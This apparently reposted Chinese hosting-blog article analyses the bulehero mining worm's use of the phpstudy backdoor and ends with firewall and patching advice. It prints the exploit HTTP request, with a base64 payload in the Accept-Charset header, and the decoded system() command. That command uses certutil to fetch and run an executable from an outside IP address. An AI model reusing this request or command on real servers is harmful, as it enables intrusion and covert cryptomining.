phpstudy存后门漏洞，可使用升级的bulehero挖矿蠕虫入侵服务器植入恶意挖矿程序

　　【内容声明】本文源于互联网收集整理，不代表YINGSOO观点！若有咨询“phpstudy存后门漏洞，可使用升级的bulehero挖矿蠕虫入侵服务器植入恶意挖矿程序”等有关服务器、云主机租用、托管、配置、价格问题，请免费咨询YINGSOO客服，为您答疑解惑！

　　【海外主机】台湾600M服务器特价 | 韩国云服务器特价 | 印度尼西亚云服务器特价

　　【推荐阅读】如何选择海外云主机？看完这7条你就会选了

　　近日，有国内安全团队监控到bulehero挖矿蠕虫进行了版本升级，蠕虫升级后开始利用最新出现的pHpstudy后门漏洞作为新的攻击方式对windows系统的服务器进行攻击，入侵成功后会下载门罗币挖矿程序进行牟利。该挖矿程序会大肆抢占服务器cpU资源进行门罗币的挖掘，造成服务器卡顿，严重影响正常业务运行，甚至造成业务终端。关于该蠕虫最早曝光于209年7月，蠕虫自出现后频繁更新，陆续加入多达数十种的的攻击方式，可以预计该黑客团伙将会不断的寻找新的攻击方式来植入其恶意程序。

　　phpstudy是国内的一款免费的pHp调试环境的程序集成包，在国内有着近百万的pHp语言学习者和开发者用户。在2019年9月20日，网上爆出phpstudy存在“后门”：黑客早在2016年就编写了“后门”文件，并非法侵入了phpstudy的官网，篡改了软件安装包植入“后门”。该“后门”具有远程控制计算机的功能，可以远程控制下载运行脚本实现用户个人信息收集。据报道黑客利用该漏洞共非法控制计算机67万余台，非法获取大量账号密码类、聊天数据类、设备码类等数据10万余组。该“后门”除了会造成挖矿和信息泄露，还有可能被勒索病毒利用，服务器关键数据被勒索病毒加密后将无法找回，给被害者造成大量的数据、经济损失。

　　攻击者会向被攻击的服务器发送一个利用漏洞的Http get请求，恶意代码存在于请求头的Accept-charset字段，字段内容经过base64编码。解码后可以发现这是一段windows命令：利用certutil.exe工具下载download.exe

　　get/index.phpHttp/1.1connection:Keep-AliveAccept:*/*Accept-charset:c3lzdgVtKcdjZXJ0dXRpbc5legUgLXVybgnhY2hlic1zcgxpdcAtZibodHRwoi8vnjAumtY0Lji1mc4xnzA6mzg4oc9kb3dubg9hZc5legUgJVn5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3agZxmtm5otAuZXhlicYgJVn5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3agZxmtm5otAuZXhlJyk7ZwnobybtZdUoJ3bocHn0dwR5Jyk7Accept-encoding:gzip,deflateAccept-Language:zh-cnReferer:http://xxx:80/index.phpUser-Agent:mozilla/4.0(compatible;msie9.0;windowsnt6.1)Host:xxx

　　解码后内容：

　　system('certutil.exe-urlcache-split-fhttp://60.164.250.170:3888/download.exe%systemRoot%/temp/gbnnnmywkvgwhfq13990.exe&%systemRoot%/temp/gbnnnmywkvgwhfq13990.exe');echomd5('phpstudy');

　　被感染的服务器会通过download.exe下载器下载名为scarupnpLogon.exe的文件。该文件会释放多个打包的恶意文件，这些恶意文件可分为三个模块：挖矿模块、扫描模块、攻击模块。

　　针对此后门漏洞，服务器用户需要对涉及的漏洞及时修复，否则容易成为挖矿木马的受害者。

　　建议使用高性能的防火墙产品，其阻断恶意外联、能够配置智能策略的功能，能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明，下载、挖矿、反弹shell这些操作，都需要进行恶意外联；防火墙的拦截将彻底阻断攻击链。此外，用户还可以通过自定义策略，直接屏蔽恶意网站，达到阻断入侵的目的。

　　优惠产品：美国服务器租用去首页参与活动！YINGSOO推出PHA挖矿服务器、PHA挖矿教程、Chia奇亚服务器、Swarm物理节点服务器、Swarm母鸡服务器、Swarm云节点服务器、《Phala PHA挖矿资料大全》、《swarm bzz挖矿资料大全》,Swarm Bee节点租用请咨询YINGSOO客服！

版权声明：本站文章来源标注为YINGSOO的内容版权均为本站所有，欢迎引用、转载，请保持原文完整并注明来源及原文链接。禁止复制或仿造本网站，禁止在非www.yingsoo.com所属的服务器上建立镜像，否则将依法追究法律责任。本站部分内容来源于网友推荐、互联网收集整理而来，仅供学习参考，不代表本站立场，如有内容涉嫌侵权，请联系alex-e#qq.com处理。